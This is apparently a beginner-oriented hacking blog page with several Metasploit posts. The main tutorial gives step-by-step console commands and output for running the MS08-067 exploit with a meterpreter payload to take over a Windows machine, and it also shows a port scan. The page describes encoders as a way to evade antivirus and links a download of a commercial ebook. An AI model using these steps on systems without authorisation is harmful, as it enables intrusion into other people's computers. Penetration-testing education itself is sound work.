Friday, January 6, 2012

Metasploit Tutorial 2

   Basics Part 2 - Using The Inbuilt Codes

Welcome to the Metasploit Basics Part 2 . Make sure you read the first part here before reading this

In this part we will talk about using the Exploits , Payloads , Auxiliary , Nops and Encoders

I think i don't need to explain what are these because it is already discussed in the first part 

Metasploit have

+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

This may vary in your metasploit according to your version.

The Basic use of metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit

Now time for a example  

Type "show exploits"  see the list of exploits available. Many of the exploits listed here are going to work against the target servers.But the difficult part is to know if the exploits will work or not =P

I will use 

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Now time to see the exploit commands we type "help"
msf exploit(ms08_067_netapi) > help
Many commands arrives but i needed to check the exploits commands :( Yeh got it it is in the last :)

Exploit Commands

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    rcheck        Reloads the module and checks if the target is vulnerable
    reload        Just reloads the module
    rexploit      Reloads the module and launches an exploit attempt

Now it is time to see some information about the exploit 

type "info" to see this all magic happen

you will see many information about the exploit like name,version,available targets etc 
in the above we were just seeking at the information about the exploit but the original stunt now comes

We will set the payload that will work after the exploitation is successful

To see the available payloads type "show payloads"
Now we will select a payload i prefer windows/meterpreter/bind_tcp
msf > exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
  type " show options " to see all available options that we have to fill up.

We need to set the RHOST ( The Victim ). We type set RHOST ( X - The Ip Adreess) 
Now when you type show options you will see the RHOST will be filled with the ip address :)

The options varies from exploit to exploit sometimes it may even ask LHOST which you have to fill by your local ip or your computer ip that is also same you have to type set LHOST

The 'set' command allows you to configure Framework options and parameters for the current module you are working with. 

after all the options are filled up time to check the host before trying exploit it .. 

We have a system, we have an exploit.  Are we going to be able to compromise the system?  Now is the time to find out. To perform the check type "check ". This may not work on all exploits.  This will see if the server or target appears vulnerable. For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary

Now if you are sure all things went right type the command " exploit "

If successful you will see something like ( Appropriate )

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened ( ->
[*] Exploit completed, 
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1... 
The basic Steps used

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST [TARGET IP]
msf exploit(ms08_067_netapi) > exploit

Now you own the PC it is yours you can do any thing with it i will not explain those here because another article wants it

The article is becoming longer . I have to make you understand auxiliary , nops and encoders in brief

The Auxiliary modules perform scanning, fuzzing, sniffing, information gathering and much more . This module does not give you a shell but they are equally important as the exploit and payloads.

I will take offensive security's help i cant write so much my hand is paining

Auxiliary Example

Port Scanning

In addition to running Nmap, there are a variety of other port scanners that are available to us within the framework.

msf > search portscan
[*] Searching loaded modules for pattern 'portscan'...


   Name                        Description
   ----                        -----------
   scanner/portscan/ack        TCP ACK Firewall Scanner
   scanner/portscan/ftpbounce  FTP Bounce Port Scanner
   scanner/portscan/syn        TCP SYN Port Scanner
   scanner/portscan/tcp        TCP Port Scanner
   scanner/portscan/xmas       TCP "XMas" Port Scanner 
The Result
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf auxiliary(syn) > set INTERFACE eth0
msf auxiliary(syn) > set PORTS 80
PORTS => 80
msf auxiliary(syn) > set RHOSTS
msf auxiliary(syn) > set THREADS 50
msf auxiliary(syn) > run

[*] Auxiliary module execution completed

Read More

Here is also a youtube video with another example


The simplified NOP mixin provided in Msf::Simple::Nop extends each nop module instance with a method called generate_simple. This method takes the length of the sled to generate and the hash of options that should be used for the generation. On success, the return value is a buffer that is encoded using the Msf::Simple::Buffer class using the format specified in the option hash as the ’Format’ element. If no format is specified, the raw version of the NOP sled is returned.


Encoder modules are used to generate transformed versions of raw payloads in a way that allows them to be restored to their original form at execution time and then subsequently executed. To accomplish this, most encoders will take the raw form of the payload and run it through some kind of encoding algorithm, like bitwise XOR. After the encoded version is generated, a decoding stub is prefixed to the encoded version of the payload. This stub is responsible for performing the inverse operation on the buffer attached to the decoder when it executes. After the decoder restores the payload to its original form, it will transfer execution to the start of the now normalized payload.
To support the above described encoder model, the Metasploit framework provides the Msf::Encoder class which inherits from the Msf::Module base class. All encoders must inherit from the Msf::Encoder class at some level to ensure that encoder-specific methods are included in the derived class.
Like the module information hash, encoders have some specialized information hash elements that describe information about the encoder being used. The information that encoder modules need to describe are the attributes of the decoder which is conveyed through the Decoder information hash element. The Decoder hash element references another hash that contains decoder specific properties. These are described in the table shown in figure 6.3 along with their types and module instance accessors.

Explaining NOPS and Encoders will make newbies confuse. So i will explain these latter

This is just the basic usages and was totally written for beginners more advance information about metasploit is waiting to be posted. 

Replies , Questions and Suggestion regarding this topic is welcomed


Metasploit Tutorial Basics

Metasploit Tutorial 1 - Understanding The Framework

What is Metasploit ?

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

Basically Metasploit is tool which provides complete environment for hacking.

Metasploit is ran by rapid7 community & Metasploit is the biggest software which is written in ruby
Why metasploit is recommended ?

  1. metasploit is free n easy to use and one can develop his own exploits,payloads etc & use it with metasploit easily.
  2.  It comes with over 690 exploits & which are updated on regular basis(0days also included).
  3. We can use diffrent plugins,external tools to improve the productivity of metasploit for example SET(social engineering toolkit), beEF, XSSF, Nexpose , NMAP, W3af etc(we will continue to it in next posts)

Metasploit is available in 3 versions

  1. Metasploit Pro - for pentester
  2. Metasploit Express- for IT security teams
  3. Metasploit Framework - Its an open source & avialable for download for free

you can download metasploit from official website -

Working of Metasploit


Basically metasploit works on these 5 things
 What is an exploit -

To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system. Exploits often deliver a payload to the target system to grant the attacker access to the system.Here is a article on basic working of EXPLOITS

What is a payload?
A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there.

Basically payload is the way you want to hack your target.Meterpreter is the most reliable payload & we will use it in most of the cases ahead

What is auxiliary?

Metasploit comes with 358 auxiliary.Basically auxiliary is used for information gathering before exploitation for ex if the machine is vulnerable to an attack or not . Here is video on email extractor auxiliary.

What are Nops & Encoders?

Metasploit comes with 8nops & 27 encoders these are used to bypass antiviruses/firewall via different techniques

So moving on to metasploit framework & some important commands
metasploit console is easy to understand if one uses his common sense

the help command does the trick.It shows all the commands available in metasploit.
metasploit help

We will move onto series of discussions & tutorial on metasploit later


Tuesday, August 2, 2011

Metasploit – The Penetration Tester’s Guide Ebook

"The best guide to the Metasploit Framework." —HD Moore, Founder of the Metasploit ProjectThe Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester's Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors.
Once you've built your foundation for penetration testing, you'll learn the Framework's conventions, interfaces, and module system as you launch simulated attacks. You'll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, wireless attacks, and targeted social-engineering attacks.
Learn how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts
You'll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to secure your own networks or to put someone else's to the test, Metasploit: The Penetration Tester's Guide will take you there and beyond.

About the Author

David Kennedy is Chief Information Security Officer at Diebold Incorporated and creator of the Social-Engineer Toolkit (SET), Fast-Track, and other open source tools. He is on the Back|Track and Exploit-Database development team and is a core member of the Social-Engineer podcast and framework. Kennedy has presented at a number of security conferences including Black Hat, DEF CON, ShmooCon, Security B-Sides, and more.
Jim O'Gorman is a professional penetration tester with CSC's StrikeForce, a co-founder of, and an instructor at Offensive-Security. He is involved in digital investigations and malware analysis, and helped build forensic capabilities into Back|Track Linux. When not working on various security issues, Jim spends his time assisting his children in their attempts to fight Zombie hordes.
Devon Kearns is an instructor at Offensive-Security, a Back|Track Linux developer, and administrator of The Exploit Database. He has contributed a number of Metasploit exploit modules and is the maintainer of the Metasploit Unleashed wiki.
Mati Aharoni is the creator of the Back|Track Linux distribution and founder of Offensive-Security, the industry leader in security training.

Product Details

  • Paperback: 328 pages
  • Publisher: No Starch Press; 1 edition (July 22, 2011)
  • Language: English
  • ISBN-10: 159327288X
  • ISBN-13: 978-1593272883
  • Product Dimensions: 9.2 x 6.9 x 1 inches

download: Metasploit Penetration Tester's Guide here--

Sunday, June 19, 2011

Metasploit Pro

 Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers.[ Metasploit Pro includes all features of Metasploit Express and adds advanced penetration testing features such as web application scanning and exploitation, social engineering campaigns, and VPN pivoting.[9] Metasploit Pro is available as a 7-day trial.

Minimum System Requirements for metasploit pro
  • 2 GHz+ processor
  • 2 GB RAM available (increase accordingly with VM targets on the same device)
  • 500 MB+ available disk space
  • 10/100 Mbps network interface card

Choose your operating system to download free trial version of metasploit pro

32-bit OS
64-bit OS
  • Windows XP, Vista, 7, Server 2003, and Server 2008
Download Download
  • Red Hat Enterprise Linux 5
Download Download
  • Ubuntu Linux 8.04+
Download Download

Thursday, June 16, 2011


Metasploit Framework is command line framework of metasploit where everything is to be done manually with commands it is much stable than other gui versions of metasploit.

Metasploit Framework is free to download as we all know metasploit is open source.
metasploit framework

The basic steps for exploiting a system using the Framework include -
  1. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 300 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
  2. Checking whether the intended target system is susceptible to the chosen exploit (optional);
  3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry, for instance a remote shell or a VNC server);
  4. Choosing the encoding technique to encode the payload so that the intrusion-prevention system (IPS) will not catch the encoded payload;
  5. Executing the exploit.
This modularity of allowing to combine any exploit with any payload is the major advantage of the Framework: it facilitates the tasks of attackers, exploit writers, and payload writers.
Versions of the Metasploit Framework since v3.0 are written in the Ruby programming language. The previous version 2.7, was implemented in Perl. It runs on all versions of Unix (including Linux and Mac OS X), and also on Windows. It includes two command-line interfaces, a web-based interface and a native GUI. The web interface is intended to be run from the attacker's computer. The Metasploit Framework can be extended to use external add-ons in multiple languages.
To choose an exploit and payload, some information about the target system is needed such as operating system version and installed network services. This information can be gleaned with port scanning and OS fingerprinting tools such as nmap. Nessus can, in addition, detect the target system's vulnerabilities


The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
The Metasploit Project is also well-known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Metasploit was created by HD Moore in 2003 as a portable network tool using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language and has now become the world's largest Ruby project, with over 700,000 lines of code. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third-party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced[1] that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity's Canvas or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open-core proprietary editions called Metasploit Express and Metasploit Pro .